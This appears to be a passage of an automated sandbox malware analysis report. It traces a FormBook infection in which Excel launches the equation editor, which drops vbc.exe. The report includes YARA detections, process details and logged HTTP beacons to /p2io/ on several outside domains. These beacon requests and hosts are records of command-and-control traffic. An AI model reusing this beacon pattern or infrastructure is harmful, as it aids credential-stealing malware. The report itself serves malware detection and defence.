61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-heig
May 13, 2021 08:30:52.716916084 CEST	1950	IN	Data Raw: 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 Data Ascii: ht:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-bloc
May 13, 2021 08:30:52.716931105 CEST	1951	IN	Data Raw: 20 70 61 72 61 20 61 63 65 73 73 61 72 20 65 73 74 65 20 73 69 74 65 22 0a 20 20 7d 2c 0a 20 20 22 65 73 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 6f 20 64 65 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 Data Ascii: para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": "
May 13, 2021 08:30:52.716942072 CEST	1952	IN	Data Raw: 69 74 6c 65 22 3a 20 22 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 85 e0 a4 b8 e0 a5 8d e0 a4 b5 e0 a5 80 e0 a4 95 e0 a5 83 e0 a4 a4 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 e0 a4 86 e0 a4 aa e0 a4 95 Data Ascii: itle": " ", "content-title": " " }, "ja": { "tit
May 13, 2021 08:30:52.716949940 CEST	1953	IN	Data Raw: 73 20 3d 20 74 5b 6c 61 6e 67 75 61 67 65 5d 20 7c 7c 20 74 5b 22 65 6e 22 5d 3b 0a 20 20 2f 2f 20 52 65 70 6c 61 63 65 20 63 6f 6e 74 65 6e 74 20 6f 6e 20 73 63 72 65 65 6e 0a 20 20 66 6f 72 20 28 76 61 72 20 69 64 20 69 6e 20 74 72 61 6e 73 6c Data Ascii: s = t[language] \|\| t["en"]; // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } //

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49170	54.85.86.211	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 13, 2021 08:30:57.953911066 CEST	1954	OUT	GET /p2io/?6lzd4R3=OHUffbgoy2VqJ0zB09fk0Sz2RAv4pH8VLsbDGAU3/+1JsitNqq1vDuPE6GmoG7EUPLorsQ==&Mj=8pGl2P HTTP/1.1 Host: www.brunoecatarina.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 13, 2021 08:30:58.093216896 CEST	1955	IN	HTTP/1.1 200 OK Date: Thu, 13 May 2021 06:30:58 GMT Server: Apache Set-Cookie: session=qqd6kohrrv32d3j3vlcr9e8hne; path=/; domain=.brunoecatarina.com; secure; SameSite=None Vary: Accept-Encoding,User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Data Raw: 37 34 33 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 73 69 73 74 65 6d 61 2e 63 61 73 61 72 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 76 3d 32 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 43 61 73 61 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 4d 78 74 6d 44 57 69 41 4f 76 2d 53 75 34 7a 39 2d 73 55 41 79 4a 4a 4e 55 47 74 6c 68 79 56 42 4d 75 42 61 33 43 31 66 71 73 22 20 2f 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 65 6d 62 65 64 2e 74 79 70 65 66 6f 72 6d 2e 63 6f 6d 2f 65 6d 62 65 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 21 2d 2d 20 48 54 4d 4c 35 20 53 68 69 6d 20 61 6e 64 20 52 65 73 70 6f 6e 64 2e 6a 73 20 49 45 38 20 73 75 70 70 6f 72 74 20 6f 66 20 48 54 4d 4c 35 20 65 6c 65 6d 65 6e 74 73 20 61 6e 64 20 6d 65 64 69 61 20 71 75 65 72 69 65 73 20 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 6c 69 62 73 2f 68 74 6d 6c 35 73 68 69 76 2f 33 2e 37 2e 30 2f 68 74 6d 6c 35 73 68 69 76 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 6c 69 62 73 2f 72 65 73 70 6f 6e 64 2e 6a 73 2f 31 2e 33 2e 30 2f 72 65 73 70 6f 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 3c 21 2d 2d 20 6f 70 65 6e 20 67 72 61 70 68 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 43 61 73 61 72 2e 63 6f 6d 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 66 62 3a 61 70 70 5f 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 36 32 31 33 35 32 38 33 37 39 35 37 37 33 36 22 2f 3e 0a 3c 21 2d 2d 20 65 6e 64 20 6f 70 65 6e 20 67 72 61 70 68 20 2d 2d 3e 0a 0a 0a 20 20 20 20 20 20 3c 21 2d 2d 20 67 6f 6f 67 6c 65 20 61 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 Data Ascii: 7438<!DOCTYPE html><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="//sistema.casar.com/favicon.ico?v=2" /><title>Pgina no encontrada \| Casar.com</title><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="google-site-verification" content="GMxtmDWiAOv-Su4z9-sUAyJJNUGtlhyVBMuBa3C1fqs" /><script src="https://embed.typeform.com/embed.js"></script>... HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->...[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script><![endif]-->... open graph --> <meta property="og:site_name" content="Casar.com"/> <meta property="og:type" content="website"> <meta property="fb:app_id" content="621352837957736"/>... end open graph --> ... google analytics --><script> (function(i,s,o,g,r,a,m){i['GoogleAnalyt
May 13, 2021 08:30:58.093250990 CEST	1956	IN	Data Raw: 69 63 73 4f 62 6a 65 63 74 27 5d 3d 72 3b 69 5b 72 5d 3d 69 5b 72 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 28 69 5b 72 5d 2e 71 3d 69 5b 72 5d 2e 71 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 2c 69 5b 72 5d 2e 6c Data Ascii: icsObject']=r;i[r]=i[r]\|\|function(){ (i[r].q=i[r].q\|\|[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google
May 13, 2021 08:30:58.093275070 CEST	1958	IN	Data Raw: 68 61 73 65 27 2c 20 27 4c 65 61 64 27 2c 20 27 43 6f 6d 70 6c 65 74 65 52 65 67 69 73 74 72 61 74 69 6f 6e 27 5d 3b 0a 20 20 20 20 76 61 72 20 74 72 61 63 6b 54 79 70 65 20 3d 20 28 73 74 64 54 72 61 63 6b 73 2e 69 6e 64 65 78 4f 66 28 65 76 74 Data Ascii: hase', 'Lead', 'CompleteRegistration']; var trackType = (stdTracks.indexOf(evtName) > -1) ? 'track' : 'trackCustom'; if (evtParams) { fbq(trackType, evtName, evtParams); } else { fbq(trackType, evtName); } }}
May 13, 2021 08:30:58.093298912 CEST	1959	IN	Data Raw: 79 4e 76 31 73 63 6e 33 74 73 33 4e 59 6f 6e 4a 57 34 4c 38 37 50 4c 36 36 5a 2f 32 38 4e 58 37 35 6f 72 2f 34 46 72 38 35 58 2f 32 39 4f 6e 33 38 2b 50 64 66 61 44 2f 38 4b 76 35 75 74 44 39 38 66 58 7a 78 74 62 30 71 73 58 33 38 74 6a 2f 36 59 Data Ascii: yNv1scn3ts3NYonJW4L87PL66Z/28NX75or/4Fr85X/29On38+PdfaD/8Kv5utD98fXzxtb0qsX38tj/6Yn+/f7/7Z/46/D566z378/18+j++Pv/5nTs0tv655D47LP78cH5wdTkjazXfp7/4l7/4mP1qMP88LvHVoDMXof1v9LYcpfSaY/38+XurcT28+jtor3yzqjdnbXpusvz3eX37sXZf3f75of/7qP50uDrnbnrrGPz2eL
May 13, 2021 08:30:58.093322039 CEST	1960	IN	Data Raw: 20 20 0a 20 20 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 64 65 66 61 75 6c 74 22 20 69 64 3d 22 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 70 72 69 6e 63 69 70 61 6c 22 3e 0a 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 70 75 6c 6c Data Ascii: <div class="navbar-default" id="mobile-menu-principal"> <a class="pull-left logo" href="//www.casar.com"> <img src="//sistema.casar.com/img/layout/rebranding/logo-casarpontocom-anel-70.png" alt="Logo Casar Site
May 13, 2021 08:30:58.093346119 CEST	1962	IN	Data Raw: 2d 77 69 64 74 68 3a 20 31 33 34 70 78 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 73 65 63 6f 6e 64 5f 6c 6f Data Ascii: -width: 134px" /> <img class="second_logo" src="//sistema.casar.com/img/layout/rebranding/logo-casarpontocom-anel-70.png" alt="Logo Casar Site de casament
May 13, 2021 08:30:58.093369007 CEST	1963	IN	Data Raw: 73 73 3d 22 61 74 69 76 6f 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 73 61 72 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 64 65 73 74 61 71 75 65 22 3e 48 6f 6d 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: ss="ativo"><a href="https://www.casar.com" class="destaque">Home</a></li> <li><a href="https://www.casar.com/assunto/casamentos/casamentos-reais/">Casamentos Reais</a></li> <li><a href="h
May 13, 2021 08:30:58.093425035 CEST	1965	IN	Data Raw: 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 20 20 64 72 6f 70 64 6f 77 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <li class=" dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown" onclick="trackEvt('home', 'menu', 'eventos'); return true;">
May 13, 2021 08:30:58.093452930 CEST	1966	IN	Data Raw: 74 6f 67 67 6c 65 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 64 72 6f 70 64 6f 77 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 6e 63 6c 69 63 6b 3d 22 74 72 61 63 6b 45 76 74 28 27 68 6f 6d 65 27 Data Ascii: toggle" data-toggle="dropdown" onclick="trackEvt('home', 'menu', 'facasitegratis'); return true;"> Site de Casamento <b class="caret"></b> </a> <
May 13, 2021 08:30:58.093477011 CEST	1967	IN	Data Raw: 6f 73 2e 63 61 73 61 72 2e 63 6f 6d 2f 62 75 73 63 61 22 20 20 6f 6e 63 6c 69 63 6b 3d 22 74 72 61 63 6b 45 76 74 28 27 73 69 74 65 2d 64 6f 73 2d 6e 6f 69 76 6f 73 2d 6d 65 6e 75 27 2c 20 27 62 75 73 63 61 64 6f 72 2d 6c 69 73 74 61 27 2c 20 27 Data Ascii: os.casar.com/busca" onclick="trackEvt('site-dos-noivos-menu', 'buscador-lista', 'compre-seu-presente'); return true;">Encontre um casamento</a></li> </ul> </li> </ul>
May 13, 2021 08:30:58.226202965 CEST	1969	IN	Data Raw: 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 3c 64 Data Ascii: ainer"> <h1>Pgina no encontrada</h1> <br><div class="alert alert-danger">Verifique o endereo (URL) e tente novamente</div> </div> </div> <link href="//fonts.googleapis.com/css?family=S

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49171	75.2.66.247	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 13, 2021 08:31:03.737710953 CEST	1986	OUT	GET /p2io/?6lzd4R3=tbodHACtgT9/nyAEdlemmH955SxRRtof3zi2445TBfF16F/HFiIOFMKIU8rcotkBv81FvA==&Mj=8pGl2P HTTP/1.1 Host: www.zmzcrossrt.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 13, 2021 08:31:04.017532110 CEST	1986	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Thu, 13 May 2021 06:31:03 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.zmzcrossrt.xyz/p2io/?6lzd4R3=tbodHACtgT9/nyAEdlemmH955SxRRtof3zi2445TBfF16F/HFiIOFMKIU8rcotkBv81FvA==&Mj=8pGl2P Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49172	104.21.65.7	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 13, 2021 08:31:09.133264065 CEST	1987	OUT	GET /p2io/?6lzd4R3=PONkgH6JO+VmGu/vZj4YyU3gBn/U0y1OFS1Y8BXnr3YdY2x3tUozsPT0NTVR3XOxnye2KQ==&Mj=8pGl2P HTTP/1.1 Host: www.cyrilgraze.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 13, 2021 08:31:09.192511082 CEST	1988	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 13 May 2021 06:31:09 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Thu, 13 May 2021 07:31:09 GMT Location: https://www.cyrilgraze.com/p2io/?6lzd4R3=PONkgH6JO+VmGu/vZj4YyU3gBn/U0y1OFS1Y8BXnr3YdY2x3tUozsPT0NTVR3XOxnye2KQ==&Mj=8pGl2P cf-request-id: 0a0605146d00004e4a0117e000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=8tdnjQDnN9vLlbS%2FB2GC%2FexX71BapxCsYrrxNGR2RfPZR4QM7hOQP9rjbZTuMAGuVvFfnypHVA2U%2BLl2OKcG9XqKp5DHYZlcWnR2XJizjqOEoco%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 64e9d79a4e9e4e4a-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2136 Parent PID: 584

General

Start time:	08:28:37
Start date:	13/05/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fd80000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2412 Parent PID: 584

General

Start time:	08:28:59
Start date:	13/05/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 3064 Parent PID: 2412

General

Start time:	08:29:05
Start date:	13/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0xb0000
File size:	1832960 bytes
MD5 hash:	92BD99870C4E2829F3E6D1B3B512067D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2468 Parent PID: 3064

General

Start time:	08:29:08
Start date:	13/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0xb0000
File size:	1832960 bytes
MD5 hash:	92BD99870C4E2829F3E6D1B3B512067D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2876 Parent PID: 3064

General

Start time:	08:29:08
Start date:	13/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0xb0000
File size:	1832960 bytes
MD5 hash:	92BD99870C4E2829F3E6D1B3B512067D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2228 Parent PID: 3064

General

Start time:	08:29:09
Start date:	13/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0xb0000
File size:	1832960 bytes
MD5 hash:	92BD99870C4E2829F3E6D1B3B512067D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2236 Parent PID: 3064

General

Start time:	08:29:10
Start date:	13/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0xb0000
File size:	1832960 bytes
MD5 hash:	92BD99870C4E2829F3E6D1B3B512067D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 1388 Parent PID: 2236

General

Start time:	08:29:12
Start date:	13/05/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0xffca0000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: autofmt.exe PID: 2520 Parent PID: 1388

General

Start time:	08:29:29
Start date:	13/05/2021
Path:	C:\Windows\SysWOW64\autofmt.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autofmt.exe
Imagebase:	0xf30000
File size:	658944 bytes
MD5 hash:	A475B7BB0CCCFD848AA26075E81D7888
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 1900 Parent PID: 2236

General

Start time:	08:29:36
Start date:	13/05/2021
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xda0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
